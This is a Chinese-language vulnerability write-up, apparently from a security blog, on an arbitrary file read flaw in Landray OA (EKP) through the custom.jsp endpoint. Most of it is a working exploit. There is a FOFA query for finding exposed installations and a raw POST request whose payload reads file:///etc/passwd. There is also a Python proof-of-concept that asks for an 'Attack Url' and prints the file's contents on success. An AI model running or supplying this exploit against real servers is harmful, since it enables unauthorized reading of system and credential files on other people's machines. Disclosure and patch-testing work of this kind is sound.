蓝凌OA_custom.jsp_任意文件读取

# 蓝凌OA custom.jsp 任意文件读取

## 漏洞描述

深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息。

## 漏洞影响

> 蓝凌OA

## FOFA

> app=”Landray-OA系统”

## 漏洞复现

出现漏洞的文件为 custom.jsp

请求包为

“`
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

var={“body”:{“file”:”file:///etc/passwd”}}
“`

![](/static/qingy/蓝凌OA_custom.jsp_任意文件读取/img/lanling-2.png)

## 漏洞POC

“`python
#!/usr/bin/python3
#-*- coding:utf-8 -*-

import base64
import requests
import random
import re
import json
import sys

def POC_1(target_url):
vuln_url = target_url + “/sys/ui/extend/varkind/custom.jsp”
headers = {
“User-Agent”: “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36”,
“Content-Type”: “application/x-www-form-urlencoded”
}
data = ‘var={“body”:{“file”:”file:///etc/passwd”}}’
try:
response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=10)
print(“\033[36m[o] 正在请求 {}/sys/ui/extend/varkind/custom.jsp \033[0m”.format(target_url))
if “root:” in response.text and response.status_code == 200:
print(“\033[36m[o] 成功读取 /etc/passwd \n[o] 响应为:{} \033[0m”.format(response.text))

except Exception as e:
print(“\033[31m[x] 请求失败:{} \033[0m”.format(e))
sys.exit(0)

#
if __name__ == ‘__main__’:
target_url = str(input(“\033[35mPlease input Attack Url\nUrl >>> \033[0m”))
POC_1(target_url)

“`

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容